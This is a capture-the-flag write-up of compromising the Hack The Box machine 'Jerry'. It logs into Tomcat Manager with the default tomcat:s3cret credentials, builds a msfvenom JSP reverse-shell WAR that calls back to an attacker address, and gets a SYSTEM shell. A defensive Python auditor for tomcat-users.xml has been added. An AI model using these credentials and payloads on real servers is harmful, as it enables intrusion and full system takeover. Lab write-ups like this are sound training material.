Hack The Box - Jerry (Without Metasploit)

Configuration

The operating system that I will be using to tackle this machine is a Kali Linux VM.

A habit I picked up from other writeups is to map a domain name to the machine’s IP address so that it is easier to remember. This can be done by appending a line to /etc/hosts.

$ echo "10.10.10.95 jerry.htb" | sudo tee -a /etc/hosts

Reconnaissance

$ rustscan --accessible -a jerry.htb -r 1-65535 -- -sT -sV -sC -Pn
File limit higher than batch size. Can increase speed by increasing batch size '-b 1048476'.
Open 10.10.10.95:8080
Starting Script(s)
Script to be run Some("nmap -vvv -p  ")

Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-16 20:00 UTC
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:00
Completed NSE at 20:00, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:00
Completed NSE at 20:00, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:00
Completed NSE at 20:00, 0.00s elapsed
Initiating Connect Scan at 20:00
Scanning jerry.htb (10.10.10.95) [1 port]
Discovered open port 8080/tcp on 10.10.10.95
Completed Connect Scan at 20:00, 0.02s elapsed (1 total ports)
Initiating Service scan at 20:00
Scanning 1 service on jerry.htb (10.10.10.95)
Completed Service scan at 20:00, 6.61s elapsed (1 service on 1 host)
NSE: Script scanning 10.10.10.95.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:00
Completed NSE at 20:00, 0.41s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:00
Completed NSE at 20:00, 0.04s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:00
Completed NSE at 20:00, 0.00s elapsed
Nmap scan report for jerry.htb (10.10.10.95)
Host is up, received user-set (0.016s latency).
Scanned at 2021-01-16 20:00:28 UTC for 7s

PORT     STATE SERVICE REASON  VERSION
8080/tcp open  http    syn-ack Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:00
Completed NSE at 20:00, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:00
Completed NSE at 20:00, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:00
Completed NSE at 20:00, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.69 seconds

Enumeration

Port 8080 Apache Tomcat/Coyote JSP engine 1.1

We are presented with the Apache Tomcat interface. When we click on Manager App, we are prompted for credentials.

I tried the default credentials tomcat:s3cret and it logged us in!
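
A defender-side check for the weakness used above, as an added example that is not part of the original writeup: it audits a conf/tomcat-users.xml for accounts that hold Manager or Host Manager control roles with the tomcat:s3cret pair, an empty password, or a password equal to the username. The sample XML, the extra usernames and the function name audit_tomcat_users are constructed for illustration.

```python
import xml.etree.ElementTree as ET

# Constructed sample of conf/tomcat-users.xml (not taken from the target host).
SAMPLE_USERS_XML = """<tomcat-users xmlns="http://tomcat.apache.org/xml">
  <role rolename="manager-gui"/>
  <user username="tomcat" password="s3cret" roles="manager-gui,manager-script"/>
  <user username="deploy" password="deploy" roles="manager-script"/>
  <user username="monitor" password="Zk4!vR9q-constructed" roles="manager-status"/>
  <user username="ops" password="Zk4!vR9q-constructed" roles="admin-gui"/>
</tomcat-users>
"""

# Roles that grant control of the Manager or Host Manager applications.
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx", "admin-gui", "admin-script"}
KNOWN_DEFAULTS = {("tomcat", "s3cret")}  # the pair this writeup logged in with


def audit_tomcat_users(xml_text):
    """Return (username, privileged_roles, reason) for each risky account."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        if el.tag.rsplit("}", 1)[-1] != "user":  # ignore the XML namespace, if any
            continue
        name = el.get("username") or el.get("name") or ""
        password = el.get("password") or ""
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        privileged = sorted(roles & PRIVILEGED_ROLES)
        if not privileged:
            continue  # e.g. manager-status only: read-only, cannot deploy
        if (name, password) in KNOWN_DEFAULTS:
            reason = "known default pair"
        elif not password:
            reason = "empty password"
        elif password.lower() == name.lower():
            reason = "password equals username"
        else:
            continue
        findings.append((name, privileged, reason))
    return findings


if __name__ == "__main__":
    for user, roles, reason in audit_tomcat_users(SAMPLE_USERS_XML):
        print(f"[!] {user}: {reason}; roles={','.join(roles)}")
```

Any account it reports can deploy a .WAR through the Manager App, so the fix is to remove the account or give it a unique strong password, and to restrict who can reach the Manager App at all.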

Exploitation

Since we have access to the Manager App page, we can upload a malicious .WAR file, which I will generate with msfvenom.

$ msfvenom -a x64 -p java/jsp_reverse_bind_tcp LHOST=10.10.XX.XX LPORT=1337 -f war > shell.war
Payload size: 1118 bytes
Final size of war file: 1118 bytes

After it is uploaded, we see that the .WAR file we uploaded has been deployed at /shell.

Now, we set up our nc listener.

$ rlwrap nc -lvnp 1337                                                             
listening on [any] 1337 ...

Then we browse to /shell. On our listener, we get a shell as SYSTEM!

$ rlwrap nc -lvnp 1337
connect to [10.10.XX.XX] from (UNKNOWN) [10.10.10.95] 49464
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system

user.txt & root.txt

Both flags are stored in a file called 2 for the price of 1.txt, in a folder called flags on the Administrator’s Desktop.

C:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt"
type "2 for the price of 1.txt"
user.txt
7004XXXXXXXXXXXXXXXXXXXXXXXXXXXX

root.txt
04a8XXXXXXXXXXXXXXXXXXXXXXXXXXXX

Rooted! Thank you for reading, and look forward to more writeups and articles!

This post is licensed under CC BY 4.0 by the author.